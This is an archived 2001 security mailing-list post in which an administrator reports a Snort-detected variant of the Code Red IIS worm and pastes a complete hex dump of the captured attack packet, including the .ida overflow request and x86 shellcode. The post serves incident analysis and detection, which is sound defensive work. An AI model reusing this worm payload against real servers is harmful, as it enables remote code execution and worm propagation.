Now the kiddiez started playing

From: Sven Carstens (s.carstensat_private)
Date: Sun Aug 05 2001 - 13:23:25 PDT

  • Next message: Sven Carstens: "Re: Now the kiddiez started playing" 

    Just sitting here and enjoying my new snort rules.
Then a packet that reports not the codered variant
but the plain old .ida access warning.

The mandatory look into the payload reveals:
  the next variant

Only occurance twice from the same ip-adress to the same ip-adress.
The relatively quick check reveals a dial-up system that claims to use
an apache server and SuSE-Linux.

Reported him to the provider and we'll see what happens

Payload:

 length = 1526

000 : 47 45 54 20 2F 64 65 66 61 75 6C 74 2E 69 64 61   GET /default.ida
010 : 3F 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E   ?NNNNNNNNNNNNNNN
020 : 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E   NNNNNNNNNNNNNNNN
030 : 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E   NNNNNNNNNNNNNNNN
040 : 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E   NNNNNNNNNNNNNNNN
050 : 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E   NNNNNNNNNNNNNNNN
060 : 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E   NNNNNNNNNNNNNNNN
070 : 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E   NNNNNNNNNNNNNNNN
080 : 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E   NNNNNNNNNNNNNNNN
090 : 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E   NNNNNNNNNNNNNNNN
0a0 : 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E   NNNNNNNNNNNNNNNN
0b0 : 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E   NNNNNNNNNNNNNNNN
0c0 : 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E   NNNNNNNNNNNNNNNN
0d0 : 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E   NNNNNNNNNNNNNNNN
0e0 : 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E   NNNNNNNNNNNNNNNN
0f0 : 4E 25 75 39 30 39 30 25 75 36 38 35 38 25 75 63   N%u9090%u6858%uc
100 : 62 64 33 25 75 37 38 30 31 25 75 39 30 39 30 25   bd3%u7801%u9090%
110 : 75 36 38 35 38 25 75 63 62 64 33 25 75 37 38 30   u6858%ucbd3%u780
120 : 31 25 75 39 30 39 30 25 75 36 38 35 38 25 75 63   1%u9090%u6858%uc
130 : 62 64 33 25 75 37 38 30 31 25 75 39 30 39 30 25   bd3%u7801%u9090%
140 : 75 39 30 39 30 25 75 38 31 39 30 25 75 30 30 63   u9090%u8190%u00c
150 : 33 25 75 30 30 30 33 25 75 38 62 30 30 25 75 35   3%u0003%u8b00%u5
160 : 33 31 62 25 75 35 33 66 66 25 75 30 30 37 38 25   31b%u53ff%u0078%
170 : 75 30 30 30 30 25 75 30 30 3D 61 20 20 48 54 54   u0000%u00=a  HTT
180 : 50 2F 31 2E 30 0D 0A 43 6F 6E 74 65 6E 74 2D 74   P/1.0..Content-t
190 : 79 70 65 3A 20 74 65 78 74 2F 78 6D 6C 0A 48 4F   ype: text/xml.HO
1a0 : 53 54 3A 77 77 77 2E 77 6F 72 6D 2E 63 6F 6D 0A   ST:www.worm.com.
1b0 : 20 41 63 63 65 70 74 3A 20 2A 2F 2A 0A 43 6F 6E    Accept: */*.Con
1c0 : 74 65 6E 74 2D 6C 65 6E 67 74 68 3A 20 33 35 36   tent-length: 356
1d0 : 39 20 0D 0A 0D 0A 55 8B EC 81 EC 18 02 00 00 53   9 ....U........S
1e0 : 56 57 8D BD E8 FD FF FF B9 86 00 00 00 B8 CC CC   VW..............
1f0 : CC CC F3 AB C7 85 70 FE FF FF 00 00 00 00 E9 0A   ......p.........
200 : 0B 00 00 8F 85 68 FE FF FF 8D BD F0 FE FF FF 64   .....h.........d
210 : A1 00 00 00 00 89 47 08 64 89 3D 00 00 00 00 E9   ......G.d.=.....
220 : 6F 0A 00 00 8F 85 60 FE FF FF C7 85 F0 FE FF FF   o.....`.........
230 : FF FF FF FF 8B 85 68 FE FF FF 83 E8 07 89 85 F4   ......h.........
240 : FE FF FF C7 85 58 FE FF FF 00 00 E0 77 E8 9B 0A   .....X......w...
250 : 00 00 83 BD 70 FE FF FF 00 0F 85 DD 01 00 00 8B   ....p...........
260 : 8D 58 FE FF FF 81 C1 00 00 01 00 89 8D 58 FE FF   .X...........X..
270 : FF 81 BD 58 FE FF FF 00 00 00 78 75 0A C7 85 58   ...X......xu...X
280 : FE FF FF 00 00 F0 BF 8B 95 58 FE FF FF 33 C0 66   .........X...3.f
290 : 8B 02 3D 4D 5A 00 00 0F 85 9A 01 00 00 8B 8D 58   ..=MZ..........X
2a0 : FE FF FF 8B 51 3C 8B 85 58 FE FF FF 33 C9 66 8B   ....Q<..X...3.f.
2b0 : 0C 10 81 F9 50 45 00 00 0F 85 79 01 00 00 8B 95   ....PE....y.....
2c0 : 58 FE FF FF 8B 42 3C 8B 8D 58 FE FF FF 8B 54 01   X....B<..X....T.
2d0 : 78 03 95 58 FE FF FF 89 95 54 FE FF FF 8B 85 54   x..X.....T.....T
2e0 : FE FF FF 8B 48 0C 03 8D 58 FE FF FF 89 8D 4C FE   ....H...X.....L.
2f0 : FF FF 8B 95 4C FE FF FF 81 3A 4B 45 52 4E 0F 85   ....L....:KERN..
300 : 33 01 00 00 8B 85 4C FE FF FF 81 78 04 45 4C 33   3.....L....x.EL3
310 : 32 0F 85 20 01 00 00 8B 8D 58 FE FF FF 89 8D 34   2.. .....X.....4
320 : FE FF FF 8B 95 54 FE FF FF 8B 85 58 FE FF FF 03   .....T.....X....
330 : 42 20 89 85 4C FE FF FF C7 85 48 FE FF FF 00 00   B ..L.....H.....
340 : 00 00 EB 1E 8B 8D 48 FE FF FF 83 C1 01 89 8D 48   ......H........H
350 : FE FF FF 8B 95 4C FE FF FF 83 C2 04 89 95 4C FE   .....L........L.
360 : FF FF 8B 85 54 FE FF FF 8B 8D 48 FE FF FF 3B 48   ....T.....H...;H
370 : 18 0F 8D C0 00 00 00 8B 95 4C FE FF FF 8B 02 8B   .........L......
380 : 8D 58 FE FF FF 81 3C 01 47 65 74 50 0F 85 A0 00   .X....<.GetP....
390 : 00 00 8B 95 4C FE FF FF 8B 02 8B 8D 58 FE FF FF   ....L.......X...
3a0 : 81 7C 01 04 72 6F 63 41 0F 85 84 00 00 00 8B 95   .|..rocA........
3b0 : 48 FE FF FF 03 95 48 FE FF FF 03 95 58 FE FF FF   H.....H.....X...
3c0 : 8B 85 54 FE FF FF 8B 48 24 33 C0 66 8B 04 0A 89   ..T....H$3.f....
3d0 : 85 4C FE FF FF 8B 8D 54 FE FF FF 8B 51 10 8B 85   .L.....T....Q...
3e0 : 4C FE FF FF 8D 4C 10 FF 89 8D 4C FE FF FF 8B 95   L....L....L.....
3f0 : 4C FE FF FF 03 95 4C FE FF FF 03 95 4C FE FF FF   L.....L.....L...
400 : 03 95 4C FE FF FF 03 95 58 FE FF FF 8B 85 54 FE   ..L.....X.....T.
410 : FF FF 8B 48 1C 8B 14 0A 89 95 4C FE FF FF 8B 85   ...H......L.....
420 : 4C FE FF FF 03 85 58 FE FF FF 89 85 70 FE FF FF   L.....X.....p...
430 : EB 05 E9 0D FF FF FF E9 16 FE FF FF 8D BD F0 FE   ................
440 : FF FF 8B 47 08 64 A3 00 00 00 00 83 BD 70 FE FF   ...G.d.......p..
450 : FF 00 75 05 E9 38 08 00 00 C7 85 4C FE FF FF 01   ..u..8.....L....
460 : 00 00 00 EB 0F 8B 8D 4C FE FF FF 83 C1 01 89 8D   .......L........
470 : 4C FE FF FF 8B 95 68 FE FF FF 0F BE 02 85 C0 0F   L.....h.........
480 : 84 8D 00 00 00 8B 8D 68 FE FF FF 0F BE 11 83 FA   .......h........
490 : 09 75 21 8B 85 68 FE FF FF 83 C0 01 8B F4 50 FF   .u!..h........P.
4a0 : 95 90 FE FF FF 3B F4 90 43 4B 43 4B 89 85 34 FE   .....;..CKCK..4.
4b0 : FF FF EB 2A 8B F4 8B 8D 68 FE FF FF 51 8B 95 34   ...*....h...Q..4
4c0 : FE FF FF 52 FF 95 70 FE FF FF 3B F4 90 43 4B 43   ...R..p...;..CKC
4d0 : 4B 8B 8D 4C FE FF FF 89 84 8D 8C FE FF FF EB 0F   K..L............
4e0 : 8B 95 68 FE FF FF 83 C2 01 89 95 68 FE FF FF 8B   ..h........h....
4f0 : 85 68 FE FF FF 0F BE 08 85 C9 74 02 EB E2 8B 95   .h........t.....
500 : 68 FE FF FF 83 C2 01 89 95 68 FE FF FF E9 53 FF   h........h....S.
510 : FF FF 8B 85 68 FE FF FF 83 C0 01 89 85 68 FE FF   ....h........h..
520 : FF 8B 4D 08 8B 91 84 00 00 00 89 95 6C FE FF FF   ..M.........l...
530 : C7 85 4C FE FF FF 04 00 00 00 C6 85 D0 FE FF FF   ..L.............
540 : 68 8B 45 08 89 85 D1 FE FF FF C7 85 D5 FE FF FF   h.E.............
550 : 5B 53 53 FF C7 85 D9 FE FF FF 63 78 90 90 8B 4D   [SS.......cx...M
560 : 08 8B 51 10 89 95 50 FE FF FF 83 BD 50 FE FF FF   ..Q...P.....P...
570 : 00 75 26 8B F4 6A 00 8D 85 4C FE FF FF 50 8B 8D   .u&..j...L...P..
580 : 68 FE FF FF 51 8B 55 08 8B 42 08 50 FF 95 6C FE   h...Q.U..B.P..l.
590 : FF FF 3B F4 90 43 4B 43 4B 83 BD 50 FE FF FF 64   ..;..CKCK..P...d
5a0 : 7D 5C 8B 8D 50 FE FF FF 83 C1 01 89 8D 50 FE FF   }\..P........P..
5b0 : FF 8B 95 50 72 25 35 44 3D 30 26 66 75 6E 63 73   ...Pr%5D=0&funcs
5c0 : 25 35 42 69 6E 76 69 73 69 62 6C 65 25 35 44 3D   %5Binvisible%5D=
5d0 : 26 66 69 65 6C 64 73 25 35 42 69 6E 76 69 73 69   &fields%5Binvisi
5e0 : 62 6C 65 25 35 44 3D 54 68 6F 72 73 74 65 6E 2B   ble%5D=Thorsten+
5f0 : 4B 69 6C 69 61 6E                                 Kilian


Comments anyone ?

CU Sven


----------------------------------------------------------------------------
This list is provided by the SecurityFocus ARIS analyzer service.
For more information on this free incident handling, management 
and tracking system please see: http://aris.securityfocus.com

    This archive was generated by hypermail 2b30 : Sun Aug 05 2001 - 13:39:50 PDT